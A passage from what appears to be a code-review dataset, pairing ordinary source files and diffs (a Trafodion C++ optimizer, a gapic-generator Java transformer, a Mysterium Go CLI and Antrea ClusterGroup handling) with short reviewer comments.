vId((CollIndex)0); joinPreds.next(vId); ItemExpr* iePtr = vId.getItemExpr(); if (iePtr->getOperatorType() == ITM_INSTANTIATE_NULL) { iePtr = iePtr -> child(0); } ValueIdSet vidSet; switch (iePtr->getOperatorType()) { case ITM_EQUAL: // this case is used to handle char type when // no VEG is formed for a char predicate, // or joins involving subqueries. case ITM_VEG_PREDICATE: case ITM_VEG_REFERENCE: // We only care columns of type ITM_BASECOLUMN (columns belonging to // base tables or table-valued stored procedures, see comment on class // BaseColumn). iePtr->findAll(ITM_BASECOLUMN, vidSet, TRUE, TRUE); // If no such columns can be found. Do not bother to continue further, // as only base table columns have the potential to be big and skewed. if ( vidSet.entries() == 0 ) return FALSE; break; default: return FALSE; } ValueId colVid((CollIndex)0); vidSet.next(colVid); if ( !colVid.getType().isSkewBusterSupportedType() ) return FALSE; // Additional test if ( colVid.getType().getTypeQualifier() == NA_NUMERIC_TYPE && colVid.getType().getTypeName() == LiteralNumeric ) { // Exact decimal numeric such as NUMERIC(18,15) can be handled, if // all columns involved in join are of the exact same precision and // and scale. The comparison ignores NULL attribute of the type (ALM 4953). for(ValueId x = vidSet.init(); vidSet.next(x); vidSet.advance(x)) { if ( NOT ((NumericType&)(colVid.getType())).equalIgnoreNull(x.getType())) return FALSE; } return TRUE; } else if ( DFS2REC::isAnyCharacter(colVid.getType().getFSDatatype()) ) { if ( ((const CharType&)colVid.getType()).getStrCharLimit() > (Lng32) CmpCommon::getDefaultNumeric(USTAT_MAX_CHAR_BOUNDARY_LEN) ) return FALSE; } return TRUE; } NABoolean Join::multiColumnjoinPredOKforSB(ValueIdSet& joinPreds) { for(ValueId x = joinPreds.init(); joinPreds.next(x); joinPreds.advance(x)) { ValueIdSet dummy(x); if ( !singleColumnjoinPredOKforSB(dummy) ) return FALSE; } return TRUE; } // The new way to capture MC skews. All such skews have been computed during // update stats. NABoolean Join::childNodeContainMultiColumnSkew( CollIndex i, // IN: which child to work on const ValueIdSet& joinPreds, // IN: the join predicate double mc_threshold, // IN: multi-column threshold Lng32 countOfPipelines, // IN: SkewedValueList** skList // OUT: the skew list ) { if (joinPreds.entries() <= 1) return FALSE; const ColStatDescList& theColList = child(i).outputLogProp((*GLOBAL_EMPTY_INPUT_LOGPROP))->colStats(); ValueId col; ValueIdSet lhsCols; CollIndex index = NULL_COLL_INDEX; const ValueIdSet& joiningCols = (i==0) ? getEquiJoinExprFromChild0() : getEquiJoinExprFromChild1() ; for (col = joiningCols.init(); joiningCols.next(col); joiningCols.advance(col) ) { theColList.getColStatDescIndex(index, col); if (index != NULL_COLL_INDEX) lhsCols.insert(theColList[index]->getColumn()); } ValueIdList dummyList; const MCSkewedValueList* mcSkewList = ((ColStatDescList&)theColList).getMCSkewedValueListForCols(lhsCols, dummyList); if ( mcSkewList == NULL ) return FALSE; // Apply the frequency threshold to each MC skew and store those passing // the thredhold test to the new skList CostScalar rc = child(i).getGroupAttr()->getResultCardinalityForEmptyInput(); CostScalar thresholdFrequency = rc * mc_threshold; *skList = new (CmpCommon::statementHeap()) SkewedValueList((CmpCommon::statementHeap())); for ( CollIndex i=0; i<mcSkewList->entries(); i++ ) { MCSkewedValue* itm = mcSkewList->at(i); if ( itm->getFrequency() >= thresholdFrequency ) { // Use an EncodedValue object to represent the current MC skew // and transfer the hash value to it. The hash value is // computed in EncodedValue::computeRunTimeHashValue() and is // the run-time version! No modification should be done to it // from this point on. EncodedValue mcSkewed = itm->getHash(); (*skList)->insertInOrder(mcSkewed); } } // Set the run-time hash status flag so that we will not try to build // the run-time hash again in // SkewedDataPartitioningFunction::buildHashListForSkewedValues(). (*skList)->setComputeFinalHash(FALSE); if ( (*skList)->entries() == 0) return FALSE; return TRUE; } // The old way to guess MC skews and repartition the data stream on one // of the columns with least skews. NABoolean Join::childNodeContainMultiColumnSkew( CollIndex i, // IN: which child to work on const ValueIdSet& joinPreds, // IN: the join predicate double mc_threshold, // IN: multi-column threshold double sc_threshold, // IN: single-column threshold Lng32 countOfPipelines, // IN: SkewedValueList** skList, // OUT: the skew list ValueId& vidOfEquiJoinWithSkew // OUT: the valueId of the column // whose skew list is returned ) const { if (joinPreds.entries() <= 1) return FALSE; typedef SkewedValueList* SkewedValueListPtr; SkewedValueList** skewLists; skewLists = new(CmpCommon::statementHeap()) SkewedValueListPtr[joinPreds.entries()]; CostScalar* skewFactors = new(CmpCommon::statementHeap()) CostScalar[joinPreds.entries()]; // A list of valueIdSets, each valueIdSet element contains a set of // columns from the join predicates. Each set has all columns from the // same table participating in the join predicates. ARRAY(ValueIdSet) mcArray(CmpCommon::statementHeap(), joinPreds.entries()); Int32 skews = 0, leastSkewList = 0; EncodedValue mostFreqVal; CostScalar productOfSkewFactors = csOne; CostScalar productOfUecs = csOne; CostScalar minOfSkewFactor = csMinusOne; CostScalar rc = csMinusOne; CostScalar currentSkew; CollIndex j = 0; NABoolean statsExist; for(ValueId vid = joinPreds.init(); joinPreds.next(vid); joinPreds.advance(vid)) { // Get the skew values for the join predicate in question. skewLists[skews] = child(i).getGroupAttr()-> getSkewedValues(vid, sc_threshold, statsExist, (*GLOBAL_EMPTY_INPUT_LOGPROP), isLeftJoin() /* include skewed NULLs only for left outer join */ ); // When the skew list is null, there are two possibilities. // 1. No stats exists, here we assume the worse (stats has not been updated), and // move to the next join predicate. // 2. The stats is present but we could not detect skews (e.g., the skews are // too small to pass the threshold test). We return FALSE to indicate that the // column is good enough to smooth out the potential skews in other columns. if ( skewLists[skews] == NULL ) { if ( !statsExist ) continue; else return FALSE; // no stats exist } // Pick the shortest skew list seen so far. The final shortest skew list // will be used for run-time skew detection. if ( skews == 0 || (skewLists[skews] && skewLists[skews] -> entries() < skewLists[leastSkewList] -> entries() ) ) { // Obtain the colstat for the child of the join predicate on // the other side of the join. CollIndex brSide = (i==0) ? 1 : 0; ColStatsSharedPtr colStats = child(brSide).getGroupAttr()-> getColStatsForSkewDetection(vid, (*GLOBAL_EMPTY_INPUT_LOGPROP)); if ( colStats == NULL ) return FALSE; // no stats exist for the inner. assume the worst // get the skew list const FrequentValueList & skInner = colStats->getFrequentValues(); CollIndex index = 0; const SkewedValueList& newList = *skewLists[skews]; CostScalar totalFreq = csZero; const NAType* nt = newList.getNAType(); NABoolean useHash = nt->useHashRepresentation(); for (CollIndex index = 0; index < skInner.entries(); index++) { const FrequentValue& fv = skInner[index]; EncodedValue skew = ( useHash ) ? fv.getHash() : fv.getEncodedValue(); if ( nt->getTypeQualifier() == NA_NUMERIC_TYPE && nt->getTypeName() == LiteralNumeric ) { skew = fv.getEncodedValue().computeHashForNumeric((SQLNumeric*)nt); } if ( newList.contains(skew) ) //totalFreq += fv.getFrequency() * fv.getProbability(); totalFreq += fv.getFrequency() ; } CostScalar totalInnerBroadcastInBytes = totalFreq * child(brSide).getGroupAttr()->getRecordLength() * countOfPipelines ; if (totalInnerBroadcastInBytes >= ActiveSchemaDB()->getDefaults() .getAsLong(MC_SKEW_INNER_BROADCAST_THRESHOLD)) // ACX QUERY 5 and 8 have skews on the inner side. Better // to bet on partitioning on all columns to handle the dual skews. // This has been proved by the performance run on 3/21/2012: a // 6% degradation when partition on the remaining non-skew column. return FALSE; leastSkewList = skews; vidOfEquiJoinWithSkew = vid; } // Get the skew factor for the join predicate in question. skewFactors[skews] = currentSkew = child(i).getGroupAttr()-> getSkewnessFactor(vid, mostFreqVal, (*GLOBAL_EMPTY_INPUT_LOGPROP)); // We compute SFa * SFb * SFc ... here productOfSkewFactors *= currentSkew; // Obtain the colstat for the ith child of the join predicate. ColStatsSharedPtr colStats = child(i).getGroupAttr()-> getColStatsForSkewDetection(vid, (*GLOBAL_EMPTY_INPUT_LOGPROP)); if ( colStats == NULL ) return FALSE; // no stats exist. Can not make the decision. return FALSE. // Compute UECa * UECb * UECc ... here productOfUecs *= colStats->getTotalUec(); // get the RC of the table if ( rc == csMinusOne ) rc = colStats->getRowcount(); // Compute the minimal of the skew factors seen so far if ( currentSkew.isGreaterThanZero() ) { if ( minOfSkewFactor == csMinusOne || minOfSkewFactor > currentSkew ) minOfSkewFactor = currentSkew; } skews++; // Collect join columns in this predicate into joinColumns data structure. ValueIdSet joinColumns; vid.getItemExpr() -> findAll(ITM_BASECOLUMN, joinColumns, TRUE, FALSE); // Separate out columns in the join predicates and group them per table. // // For example, if join predicates are t.a=s.b and t.b=s.b and t.c = s.c, // we will have // // mcArray[0] = {t.a, t.b, t.c}, // mcArray[1] = {s.a, s.b, s.c}, // // at the end of the loop over join predicates. // j = 0; for(ValueId x = joinColumns.init(); joinColumns.next(x); joinColumns.advance(x)) { if ( !mcArray.used(j) ) mcArray.insertAt(j, x); else { ValueIdSet& mcSet = mcArray[j]; mcSet.insert(x); } j++; } } // end of the loop of join predicates // Now we can find the multi-column UEC, using one of the two multi-column // ValueIdSets (one for each side of the equi-join predicate). The colstats // list for the side of the child contains the stats (including the mc ones). // one of the mc ones is what we are looking for. // ColStatDescList colStatDescList = child(i).getGroupAttr()-> outputLogProp((*GLOBAL_EMPTY_INPUT_LOGPROP))->getColStats(); CostScalar mcUec = csMinusOne; const MultiColumnUecList* uecList = colStatDescList.getUecList(); for(j=0; j < mcArray.entries() && mcUec == csMinusOne && uecList; j++) { const ValueIdSet& mc = mcArray[j]; // Do a look up with mc. if ( uecList ) mcUec = uecList->lookup(mc); } // // Compute the final value of // min( (SFa * SFb * ... *min(UECa * UECb..,RC))/UEC(abc..), // SFa, SFb, ..., ) // = min(productOfSkewFactors * min(productOfUecs, RC)/mcUEC, // minOfSkewFactor) // // min(productOfUecs, RC)/mcUEC = 1 when mcUEC is not found // CostScalar mcSkewFactor; if ( mcUec == csMinusOne || mcUec == csZero ) mcSkewFactor = MINOF(productOfSkewFactors, minOfSkewFactor); else mcSkewFactor = MINOF( productOfSkewFactors * MINOF(productOfUecs, rc) / mcUec, minOfSkewFactor ); if ( mcSkewFactor > mc_threshold ) { *skList = skewLists[leastSkewList]; return TRUE; } else return FALSE; } // // The content of this method is lifted from // DP2InsertCursorRule::nextSubstitute(). // A Note has been added in that method so that any changes // to it should be "copied" here. // NABoolean Insert::isSideTreeInsertFeasible() { // Sidetree insert is only supported for key sequenced, non-compressed, // non-audited tables with blocksize equal to 4K. // Return error, if this is not the case. Insert::InsertType itype = getInsertType(); // Sidetree insert requested? if (itype != Insert::VSBB_LOAD ) return FALSE; if ((getTableDesc()->getClusteringIndex()->getNAFileSet() ->isCompressed()) || (getTableDesc()->getClusteringIndex()->getNAFileSet() ->getBlockSize() < 4096) || (NOT getTableDesc()->getClusteringIndex()->getNAFileSet() ->isKeySequenced()) || (getTableDesc()->getClusteringIndex()->getNAFileSet() ->isAudited()) ) { return FALSE; } if ( !getInliningInfo().hasPipelinedActions() ) return TRUE; if (getInliningInfo().isEffectiveGU() || getTolerateNonFatalError() == RelExpr::NOT_ATOMIC_) return FALSE; // SideInsert is not allowed when there are pipelined actions (RI, // IM or triggers) except MV range logging. This means the only rows // projected are the very first and last rows as the beginning and // end of the range. NABoolean rangeLoggingRequired = getTableDesc()->getNATable()->getMvAttributeBitmap(). getAutomaticRangeLoggingRequired(); if (getInliningInfo().isProjectMidRangeRows() || !rangeLoggingRequired) return FALSE; return TRUE; } // big memory growth percent (to be used by SSD overlow enhancement project) short RelExpr::bmoGrowthPercent(CostScalar e, CostScalar m) { // bmo growth is 10% if 100*abs(maxcard-expected)/expected <= 100% // otherwise its 25% CostScalar expectedRows = e.minCsOne(); CostScalar maxRows = m.minCsOne(); CostScalar difference = maxRows - expectedRows; CostScalar uncertainty = (_ABSOLUTE_VALUE_(difference.value()) / expectedRows.value()) * 100; if (uncertainty <= 100) return 10; else return 25; } CostScalar RelExpr::getChild0Cardinality(const Context* context) { EstLogPropSharedPtr inLogProp = context->getInputLogProp(); EstLogPropSharedPtr ch0OutputLogProp = child(0).outputLogProp(inLogProp); const CostScalar ch0RowCount = (ch0OutputLogProp) ? (ch0OutputLogProp->getResultCardinality()).minCsOne() : csOne; return ch0RowCount; } NAString *RelExpr::getKey() { if (operKey_.length() == 0) { char keyBuffer[30]; snprintf(keyBuffer, sizeof(keyBuffer), "%ld", (Int64)this); operKey_ = keyBuffer; } return &operKey_; }
1
20,040
A small nit: This variable should start with a lower case letter.
apache-trafodion
cpp
@@ -38,12 +38,13 @@ public class PageStreamingTransformer { PageStreamingDescriptorView.Builder descriptor = PageStreamingDescriptorView.newBuilder(); descriptor.varName(context.getNamer().getPageStreamingDescriptorName(method)); - descriptor.requestTokenFieldName(pageStreaming.getRequestTokenField().getSimpleName()); + descriptor.requestTokenFieldName(context.getNamer().getRequestTokenFieldName(pageStreaming)); if (pageStreaming.hasPageSizeField()) { - descriptor.requestPageSizeFieldName(pageStreaming.getPageSizeField().getSimpleName()); + descriptor.requestPageSizeFieldName(context.getNamer().getPageSizeFieldName(pageStreaming)); } - descriptor.responseTokenFieldName(pageStreaming.getResponseTokenField().getSimpleName()); - descriptor.resourcesFieldName(pageStreaming.getResourcesFieldName()); + descriptor.responseTokenFieldName( + context.getNamer().getResponseTokenFieldName(pageStreaming)); + descriptor.resourcesFieldName(context.getNamer().getResourcesFieldName(pageStreaming)); descriptor.methodName(context.getNamer().getMethodKey(method)); descriptors.add(descriptor.build());
1
/* Copyright 2016 Google Inc * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.api.codegen.transformer; import com.google.api.codegen.config.FieldConfig; import com.google.api.codegen.config.MethodConfig; import com.google.api.codegen.config.PageStreamingConfig; import com.google.api.codegen.viewmodel.PageStreamingDescriptorClassView; import com.google.api.codegen.viewmodel.PageStreamingDescriptorView; import com.google.api.codegen.viewmodel.PagedListResponseFactoryClassView; import com.google.api.tools.framework.model.Field; import com.google.api.tools.framework.model.Method; import com.google.api.tools.framework.model.TypeRef; import java.util.ArrayList; import java.util.List; /** PageStreamingTransformer generates view objects for page streaming from a service model. */ public class PageStreamingTransformer { public List<PageStreamingDescriptorView> generateDescriptors(SurfaceTransformerContext context) { List<PageStreamingDescriptorView> descriptors = new ArrayList<>(); for (Method method : context.getPageStreamingMethods()) { MethodConfig methodConfig = context.getMethodConfig(method); PageStreamingConfig pageStreaming = methodConfig.getPageStreaming(); PageStreamingDescriptorView.Builder descriptor = PageStreamingDescriptorView.newBuilder(); descriptor.varName(context.getNamer().getPageStreamingDescriptorName(method)); descriptor.requestTokenFieldName(pageStreaming.getRequestTokenField().getSimpleName()); if (pageStreaming.hasPageSizeField()) { descriptor.requestPageSizeFieldName(pageStreaming.getPageSizeField().getSimpleName()); } descriptor.responseTokenFieldName(pageStreaming.getResponseTokenField().getSimpleName()); descriptor.resourcesFieldName(pageStreaming.getResourcesFieldName()); descriptor.methodName(context.getNamer().getMethodKey(method)); descriptors.add(descriptor.build()); } return descriptors; } public List<PageStreamingDescriptorClassView> generateDescriptorClasses( SurfaceTransformerContext context) { List<PageStreamingDescriptorClassView> descriptors = new ArrayList<>(); for (Method method : context.getPageStreamingMethods()) { descriptors.add(generateDescriptorClass(context.asRequestMethodContext(method))); } return descriptors; } private PageStreamingDescriptorClassView generateDescriptorClass( MethodTransformerContext context) { SurfaceNamer namer = context.getNamer(); ModelTypeTable typeTable = context.getTypeTable(); Method method = context.getMethod(); PageStreamingConfig pageStreaming = context.getMethodConfig().getPageStreaming(); PageStreamingDescriptorClassView.Builder desc = PageStreamingDescriptorClassView.newBuilder(); Field resourceField = pageStreaming.getResourcesField(); FieldConfig resourceFieldConfig = pageStreaming.getResourcesFieldConfig(); TypeRef resourceType = resourceField.getType(); desc.name(namer.getPageStreamingDescriptorConstName(method)); desc.typeName(namer.getAndSavePagedResponseTypeName(method, typeTable, resourceFieldConfig)); desc.requestTypeName(typeTable.getAndSaveNicknameFor(method.getInputType())); desc.responseTypeName(typeTable.getAndSaveNicknameFor(method.getOutputType())); desc.resourceTypeName(typeTable.getAndSaveNicknameForElementType(resourceField.getType())); TypeRef tokenType = pageStreaming.getResponseTokenField().getType(); desc.tokenTypeName(typeTable.getAndSaveNicknameFor(tokenType)); desc.defaultTokenValue(context.getTypeTable().getSnippetZeroValueAndSaveNicknameFor(tokenType)); desc.requestTokenSetFunction( namer.getFieldSetFunctionName(pageStreaming.getRequestTokenField())); if (pageStreaming.hasPageSizeField()) { desc.requestPageSizeSetFunction( namer.getFieldSetFunctionName(pageStreaming.getPageSizeField())); desc.requestPageSizeGetFunction( namer.getFieldGetFunctionName(pageStreaming.getPageSizeField())); } desc.responseTokenGetFunction( namer.getFieldGetFunctionName(pageStreaming.getResponseTokenField())); desc.resourcesFieldGetFunction( namer.getFieldGetFunctionName(pageStreaming.getResourcesField())); return desc.build(); } public List<PagedListResponseFactoryClassView> generateFactoryClasses( SurfaceTransformerContext context) { List<PagedListResponseFactoryClassView> factories = new ArrayList<>(); for (Method method : context.getPageStreamingMethods()) { factories.add(generateFactoryClass(context.asRequestMethodContext(method))); } return factories; } private PagedListResponseFactoryClassView generateFactoryClass(MethodTransformerContext context) { SurfaceNamer namer = context.getNamer(); ModelTypeTable typeTable = context.getTypeTable(); Method method = context.getMethod(); PageStreamingConfig pageStreaming = context.getMethodConfig().getPageStreaming(); Field resourceField = pageStreaming.getResourcesField(); FieldConfig resourceFieldConfig = pageStreaming.getResourcesFieldConfig(); PagedListResponseFactoryClassView.Builder factory = PagedListResponseFactoryClassView.newBuilder(); factory.name(namer.getPagedListResponseFactoryConstName(method)); factory.requestTypeName(typeTable.getAndSaveNicknameFor(method.getInputType())); factory.responseTypeName(typeTable.getAndSaveNicknameFor(method.getOutputType())); factory.resourceTypeName(typeTable.getAndSaveNicknameForElementType(resourceField.getType())); factory.pagedListResponseTypeName( namer.getAndSavePagedResponseTypeName(method, typeTable, resourceFieldConfig)); factory.pageStreamingDescriptorName(namer.getPageStreamingDescriptorConstName(method)); return factory.build(); } }
1
21,651
Where is this used for Node?
googleapis-gapic-generator
java
@@ -130,14 +130,14 @@ func (c *Command) handleActions(line string) { func (c *Command) connect(argsString string) { if len(argsString) == 0 { - info("Press tab to select identity or create a new one. Connect <your-identity> <node-identity>") + info("Press tab to select identity or create a new one. Connect <your-id> <provider-id>") return } identities := strings.Fields(argsString) if len(identities) != 2 { - info("Please type in the node identity. Connect <your-identity> <node-identity>") + info("Please type in the provider identity. Connect <your-id> <provider-id>") return }
1
package cli import ( "fmt" "github.com/chzyer/readline" tequilapi_client "github.com/mysterium/node/tequilapi/client" "io" "log" "strings" ) // NewCommand constructs CLI based with possibility to control quiting func NewCommand( historyFile string, tequilapi *tequilapi_client.Client, quitHandler func() error, ) *Command { return &Command{ historyFile: historyFile, tequilapi: tequilapi, quitHandler: quitHandler, } } // Command describes CLI based Mysterium UI type Command struct { historyFile string tequilapi *tequilapi_client.Client quitHandler func() error fetchedProposals []tequilapi_client.ProposalDTO completer *readline.PrefixCompleter reader *readline.Instance } const redColor = "\033[31m%s\033[0m" const identityDefaultPassphrase = "" const statusConnected = "Connected" // Run starts CLI interface func (c *Command) Run() (err error) { c.fetchedProposals = c.fetchProposals() c.completer = newAutocompleter(c.tequilapi, c.fetchedProposals) c.reader, err = readline.NewEx(&readline.Config{ Prompt: fmt.Sprintf(redColor, "» "), HistoryFile: c.historyFile, AutoComplete: c.completer, InterruptPrompt: "^C", EOFPrompt: "exit", }) if err != nil { return err } // TODO Should overtake output of CommandRun log.SetOutput(c.reader.Stderr()) for { line, err := c.reader.Readline() if err == readline.ErrInterrupt { if len(line) == 0 { c.quit() } else { continue } } else if err == io.EOF { c.quit() } c.handleActions(line) } return nil } //Kill stops tequilapi service func (c *Command) Kill() error { c.reader.Clean() err := c.reader.Close() if err != nil { return err } return c.quitHandler() } func (c *Command) handleActions(line string) { line = strings.TrimSpace(line) staticCmds := []struct { command string handler func() }{ {"exit", c.quit}, {"quit", c.quit}, {"help", c.help}, {"status", c.status}, {"proposals", c.proposals}, {"ip", c.ip}, {"disconnect", c.disconnect}, } argCmds := []struct { command string handler func(argsString string) }{ {command: "connect", handler: c.connect}, {command: "unlock", handler: c.unlock}, {command: "identities", handler: c.identities}, } for _, cmd := range staticCmds { if line == cmd.command { cmd.handler() return } } for _, cmd := range argCmds { if strings.HasPrefix(line, cmd.command) { argsString := strings.TrimSpace(line[len(cmd.command):]) cmd.handler(argsString) return } } if len(line) > 0 { c.help() } } func (c *Command) connect(argsString string) { if len(argsString) == 0 { info("Press tab to select identity or create a new one. Connect <your-identity> <node-identity>") return } identities := strings.Fields(argsString) if len(identities) != 2 { info("Please type in the node identity. Connect <your-identity> <node-identity>") return } consumerID, providerID := identities[0], identities[1] if consumerID == "new" { id, err := c.tequilapi.NewIdentity(identityDefaultPassphrase) if err != nil { warn(err) return } consumerID = id.Address success("New identity created:", consumerID) } status("CONNECTING", "from:", consumerID, "to:", providerID) _, err := c.tequilapi.Connect(consumerID, providerID) if err != nil { warn(err) return } success("Connected.") } func (c *Command) unlock(argsString string) { unlockSignature := "Unlock <identity> [passphrase]" if len(argsString) == 0 { info("Press tab to select identity.", unlockSignature) return } args := strings.Fields(argsString) var identity, passphrase string if len(args) == 1 { identity, passphrase = args[0], "" } else if len(args) == 2 { identity, passphrase = args[0], args[1] } else { info("Please type in identity and optional passphrase.", unlockSignature) return } info("Unlocking", identity) err := c.tequilapi.Unlock(identity, passphrase) if err != nil { warn(err) return } success(fmt.Sprintf("Identity %s unlocked.", identity)) } func (c *Command) disconnect() { err := c.tequilapi.Disconnect() if err != nil { warn(err) return } success("Disconnected.") } func (c *Command) status() { status, err := c.tequilapi.Status() if err != nil { warn(err) } else { info("Status:", status.Status) info("SID:", status.SessionID) } if status.Status == statusConnected { statistics, err := c.tequilapi.ConnectionStatistics() if err != nil { warn(err) } else { info(fmt.Sprintf("Connection duration: %ds", statistics.Duration)) info("Bytes sent:", statistics.BytesSent) info("Bytes received:", statistics.BytesReceived) } } } func (c *Command) proposals() { proposals := c.fetchProposals() c.fetchedProposals = proposals info(fmt.Sprintf("Found %v proposals", len(proposals))) for _, proposal := range proposals { country := proposal.ServiceDefinition.LocationOriginate.Country var countryString string if country != nil { countryString = *country } else { countryString = "Unknown" } msg := fmt.Sprintf("- provider id: %v, proposal id: %v, country: %v", proposal.ProviderID, proposal.ID, countryString) info(msg) } } func (c *Command) fetchProposals() []tequilapi_client.ProposalDTO { proposals, err := c.tequilapi.Proposals() if err != nil { warn(err) return []tequilapi_client.ProposalDTO{} } return proposals } func (c *Command) ip() { ip, err := c.tequilapi.GetIP() if err != nil { warn(err) return } info("IP:", ip) } func (c *Command) help() { info("Mysterium CLI tequilapi commands:") fmt.Println(c.completer.Tree(" ")) } func (c *Command) quit() { err := c.Kill() if err != nil { warn(err) return } } func (c *Command) identities(argsString string) { const usage = "identities command:\n list\n new [passphrase]" if len(argsString) == 0 { info(usage) return } args := strings.Fields(argsString) if len(args) < 1 { info(usage) return } action := args[0] if action == "list" { if len(args) > 1 { info(usage) return } ids, err := c.tequilapi.GetIdentities() if err != nil { fmt.Println("Error occured:", err) return } for _, id := range ids { status("+", id.Address) } return } if action == "new" { var passphrase string if len(args) == 1 { passphrase = identityDefaultPassphrase } else if len(args) == 2 { passphrase = args[1] } else { info(usage) return } id, err := c.tequilapi.NewIdentity(passphrase) if err != nil { warn(err) return } success("New identity created:", id.Address) } } func getIdentityOptionList(tequilapi *tequilapi_client.Client) func(string) []string { return func(line string) []string { identities := []string{"new"} ids, err := tequilapi.GetIdentities() if err != nil { warn(err) return identities } for _, id := range ids { identities = append(identities, id.Address) } return identities } } func getProposalOptionList(proposals []tequilapi_client.ProposalDTO) func(string) []string { return func(line string) []string { var providerIDS []string for _, proposal := range proposals { providerIDS = append(providerIDS, proposal.ProviderID) } return providerIDS } } func newAutocompleter(tequilapi *tequilapi_client.Client, proposals []tequilapi_client.ProposalDTO) *readline.PrefixCompleter { return readline.NewPrefixCompleter( readline.PcItem( "connect", readline.PcItemDynamic( getIdentityOptionList(tequilapi), readline.PcItemDynamic( getProposalOptionList(proposals), ), ), ), readline.PcItem( "identities", readline.PcItem("new"), readline.PcItem("list"), ), readline.PcItem("status"), readline.PcItem("proposals"), readline.PcItem("ip"), readline.PcItem("disconnect"), readline.PcItem("help"), readline.PcItem("quit"), readline.PcItem( "unlock", readline.PcItemDynamic( getIdentityOptionList(tequilapi), ), ), ) }
1
10,396
Is `<your-id>` really easier to understand than `<your-identity>` for CLI user? For me, `identity` seems like a concept we use publicly, and `id` is just an internal shortcut for it.
mysteriumnetwork-node
go
@@ -39,7 +39,11 @@ func (n *NetworkPolicyController) addClusterGroup(curObj interface{}) { key := internalGroupKeyFunc(cg) klog.V(2).Infof("Processing ADD event for ClusterGroup %s", cg.Name) newGroup := n.processClusterGroup(cg) - klog.V(2).Infof("Creating new internal Group %s with selector (%s)", newGroup.UID, newGroup.Selector.NormalizedName) + if newGroup.ServiceReference != nil { + klog.V(2).Infof("Creating new internal Group %s for Service %s/%s", newGroup.UID, newGroup.ServiceReference.Namespace, newGroup.ServiceReference.Name) + } else if newGroup.Selector != nil { + klog.V(2).Infof("Creating new internal Group %s with selector (%s)", newGroup.UID, newGroup.Selector.NormalizedName) + } n.internalGroupStore.Create(newGroup) n.enqueueInternalGroup(key) }
1
// Copyright 2021 Antrea Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package networkpolicy import ( "context" "fmt" v1 "k8s.io/api/core/v1" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/apimachinery/pkg/labels" "k8s.io/apimachinery/pkg/util/sets" "k8s.io/client-go/tools/cache" "k8s.io/klog" "github.com/vmware-tanzu/antrea/pkg/apis/controlplane" corev1a2 "github.com/vmware-tanzu/antrea/pkg/apis/core/v1alpha2" secv1alpha1 "github.com/vmware-tanzu/antrea/pkg/apis/security/v1alpha1" "github.com/vmware-tanzu/antrea/pkg/controller/networkpolicy/store" antreatypes "github.com/vmware-tanzu/antrea/pkg/controller/types" "github.com/vmware-tanzu/antrea/pkg/k8s" ) // addClusterGroup is responsible for processing the ADD event of a ClusterGroup resource. func (n *NetworkPolicyController) addClusterGroup(curObj interface{}) { cg := curObj.(*corev1a2.ClusterGroup) key := internalGroupKeyFunc(cg) klog.V(2).Infof("Processing ADD event for ClusterGroup %s", cg.Name) newGroup := n.processClusterGroup(cg) klog.V(2).Infof("Creating new internal Group %s with selector (%s)", newGroup.UID, newGroup.Selector.NormalizedName) n.internalGroupStore.Create(newGroup) n.enqueueInternalGroup(key) } // updateClusterGroup is responsible for processing the UPDATE event of a ClusterGroup resource. func (n *NetworkPolicyController) updateClusterGroup(oldObj, curObj interface{}) { cg := curObj.(*corev1a2.ClusterGroup) og := oldObj.(*corev1a2.ClusterGroup) key := internalGroupKeyFunc(cg) klog.V(2).Infof("Processing UPDATE event for ClusterGroup %s", cg.Name) newGroup := n.processClusterGroup(cg) oldGroup := n.processClusterGroup(og) selUpdated := newGroup.Selector.NormalizedName != oldGroup.Selector.NormalizedName ipBlockUpdated := newGroup.IPBlock != oldGroup.IPBlock if !selUpdated && !ipBlockUpdated { // No change in the selectors of the ClusterGroup. No need to enqueue for further sync. return } n.internalGroupStore.Update(newGroup) n.enqueueInternalGroup(key) } // deleteClusterGroup is responsible for processing the DELETE event of a ClusterGroup resource. func (n *NetworkPolicyController) deleteClusterGroup(oldObj interface{}) { og, ok := oldObj.(*corev1a2.ClusterGroup) klog.V(2).Infof("Processing DELETE event for ClusterGroup %s", og.Name) if !ok { tombstone, ok := oldObj.(cache.DeletedFinalStateUnknown) if !ok { klog.Errorf("Error decoding object when deleting ClusterGroup, invalid type: %v", oldObj) return } og, ok = tombstone.Obj.(*corev1a2.ClusterGroup) if !ok { klog.Errorf("Error decoding object tombstone when deleting ClusterGroup, invalid type: %v", tombstone.Obj) return } } key := internalGroupKeyFunc(og) klog.V(2).Infof("Deleting internal Group %s", key) err := n.internalGroupStore.Delete(key) if err != nil { klog.Errorf("Unable to delete internal Group %s from store: %v", key, err) } } func (n *NetworkPolicyController) processClusterGroup(cg *corev1a2.ClusterGroup) *antreatypes.Group { internalGroup := antreatypes.Group{ Name: cg.Name, UID: cg.UID, } if cg.Spec.IPBlock != nil { ipb, _ := toAntreaIPBlockForCRD(cg.Spec.IPBlock) internalGroup.IPBlock = ipb return &internalGroup } groupSelector := toGroupSelector("", cg.Spec.PodSelector, cg.Spec.NamespaceSelector, nil) internalGroup.Selector = *groupSelector return &internalGroup } // filterInternalGroupsForPod computes a list of internal Group keys which match the Pod's labels. func (n *NetworkPolicyController) filterInternalGroupsForPod(obj metav1.Object) sets.String { matchingKeySet := sets.String{} clusterScopedGroups, _ := n.internalGroupStore.GetByIndex(cache.NamespaceIndex, "") ns, _ := n.namespaceLister.Get(obj.GetNamespace()) for _, group := range clusterScopedGroups { key, _ := store.GroupKeyFunc(group) g := group.(*antreatypes.Group) if n.labelsMatchGroupSelector(obj, ns, &g.Selector) { matchingKeySet.Insert(key) klog.V(2).Infof("%s/%s matched internal Group %s", obj.GetNamespace(), obj.GetName(), key) } } return matchingKeySet } // filterInternalGroupsForNamespace computes a list of internal Group keys which // match the Namespace's labels. func (n *NetworkPolicyController) 